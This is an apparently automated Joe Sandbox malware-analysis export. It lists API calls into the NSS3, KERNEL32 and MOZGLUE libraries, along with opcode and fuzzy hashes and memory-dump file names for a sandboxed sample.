                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: fab05457f75013b42e13ff8d783ee31bd29320f206216bfe04563f31d1bdd8f0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 52be499696d33d538448be2a8f78230436e100005292521e9523cd14700006b2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fab05457f75013b42e13ff8d783ee31bd29320f206216bfe04563f31d1bdd8f0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE21D5B1D422148BEF10DFA5D8065EEB7B4EF1520CF254068D809BB741FB31AA49CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEB3C9E
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEB3CAE
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEB3CEA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEB3D02
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: c2be01baf2578b947c8948bd39402b6cffba2439936f51a75698660fba12fa6b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ddf715e4c3d370ad5f0c08c2d604ff2332b3558aa6f8e10cb480e282306629e5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2be01baf2578b947c8948bd39402b6cffba2439936f51a75698660fba12fa6b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C11B479A00204AFDB40AF24D845AAA3778EF09368F254064EC0897712EB31ED54CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CEBF0AD,6CEBF150,?,6CEBF150,?,?,?), ref: 6CEBECBA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CEBECD1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CEBED02
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC116E
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CEBED5A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7b0610fa6d44ac7ab236aa02cf04660385fd93beb67c0de9384b612b51c26d06
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3921A1B1A00B429BE700CF25DA44B62B7F4BFA534CF25C259E81C97B61EBB0E594C6D1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CED7FFA,?,6CED9767,?,8B7874C0,0000A48E), ref: 6CEEEDD4
                                                                                                                                                                                                                                                                                                                      • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CED7FFA,?,6CED9767,?,8B7874C0,0000A48E), ref: 6CEEEDFD
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CED7FFA,?,6CED9767,?,8B7874C0,0000A48E), ref: 6CEEEE14
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6CED9767,00000000,00000000,6CED7FFA,?,6CED9767,?,8B7874C0,0000A48E), ref: 6CEEEE33
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3903481028-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1c266cfc3298909c1b7f7b52c7ff5988bf3162029a673520eed32c365d0ba500
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 56b4b6378b59ba3d513677a52e9075b396aa79fb6240fa6881e937f076a4d619
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c266cfc3298909c1b7f7b52c7ff5988bf3162029a673520eed32c365d0ba500
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 701170B1A00B06ABEB109E65DC84B46B3B8EB0839DF344535E91997B50E331E86487E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: TlsGetValue.KERNEL32 ref: 6CE806C2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: EnterCriticalSection.KERNEL32(?), ref: 6CE806D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: PR_Unlock.NSS3 ref: 6CE806EB
                                                                                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6CE6DFBF
                                                                                                                                                                                                                                                                                                                      • CERT_AddCertToListTail.NSS3(00000000,?), ref: 6CE6DFDB
                                                                                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CE6DFFA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE6E029
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3183882470-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ba6ec8caac292160321b9ac21391492aeedb86f87bb963bc741355a7496a606c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A116F71AA4A066BDB500EAB5C04BAB7678AB8135CF340538E858C7F40F732C81593E1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 07c391327586960cb5daced0df1ea9507f2117465d67d8562213e6e08ca2e188
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7efa28ebb836033c6e3ed37222db5bdbc239618d3a6e13653d542e392a3e6c8f
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07c391327586960cb5daced0df1ea9507f2117465d67d8562213e6e08ca2e188
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F118F71A05A019FD740AF78C48426ABBF4FF05718F11492ADC8997B00E730E854CBD2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CF29946
                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CDE16B7,00000000), ref: 6CF2994E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE1630: TlsGetValue.KERNEL32(00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CDE1659
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CF2995E
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CountCriticalErrorInitializeLastSectionSpinValuecallocfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1588565019-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 30ca75b9a1d44a0dece882894d988229eccbe008202b425195d57918ae2b9558
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 55e61be34882ebca95e9309073ef8a464bce777b05ffcf4ee12da47572acf8e6
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30ca75b9a1d44a0dece882894d988229eccbe008202b425195d57918ae2b9558
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2901C072B507019FD761AFA88C0975B7AF8AB46B25F00042EF44AD3A40DF78A204CBA5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CEF5F17,?,?,?,?,?,?,?,?,6CEFAAD4), ref: 6CF0AC94
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CEF5F17,?,?,?,?,?,?,?,?,6CEFAAD4), ref: 6CF0ACA6
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CEFAAD4), ref: 6CF0ACC0
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CEFAAD4), ref: 6CF0ACDB
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f414393572697281eeff935dc11fafc9027382164208037dbf77204997bdb111
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2e4a665a955a16e92ce5a281b85838155f08a0313dc09b6f73fc04310b752a9c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f414393572697281eeff935dc11fafc9027382164208037dbf77204997bdb111
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46015EB1B01B019BE750DF39D958757B7E8BF00A59B518839D85AD3E00E731F055CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6CE71DFB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE695B0: TlsGetValue.KERNEL32(00000000,?,6CE800D2,00000000), ref: 6CE695D2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE695B0: EnterCriticalSection.KERNEL32(?,?,?,6CE800D2,00000000), ref: 6CE695E7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE695B0: PR_Unlock.NSS3(?,?,?,?,6CE800D2,00000000), ref: 6CE69605
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE71E09
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PR_EnterMonitor.NSS3(?,?,6CE6E175), ref: 6CE6E19C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PR_EnterMonitor.NSS3(6CE6E175), ref: 6CE6E1AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PR_ExitMonitor.NSS3 ref: 6CE6E208
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PL_HashTableRemove.NSS3(?), ref: 6CE6E219
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE6E231
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE6E249
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6E190: PR_ExitMonitor.NSS3 ref: 6CE6E257
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE71E37
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE71E4A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 499896158-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0532c50024cd3fe9f869ffc5b90e03568a38b2ad6ccf61ace2406f0cd6219e77
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d5aaffe3a7af048073d66778e92a9afdda2f1e3bc1e3422dacbc666e4405fcbc
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0532c50024cd3fe9f869ffc5b90e03568a38b2ad6ccf61ace2406f0cd6219e77
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6001DFB1B5025097EB204AA9EC10F4777B4EB42B4CF300035E81D97B90E771E916DBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE71D75
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CE71D89
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000010), ref: 6CE71D9C
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE71DB8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 939066016-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b64dc778e1f16e2120318c145cc5d5fad96e40c3540204f8e1ded64e101f5bff
                                                                                                                                                                                                                                                                                                                      • Instruction ID: bc9aaf678a910a08165f6c50feb033f4cfb593cca5f78729da45174b1d1eb784
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b64dc778e1f16e2120318c145cc5d5fad96e40c3540204f8e1ded64e101f5bff
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6F026B2A0130057FB301A999D52B4736B89B81B8DF300235DA1D87B04D660E400CAF2
                                                                                                                                                                                                                                                                                                                      APIs
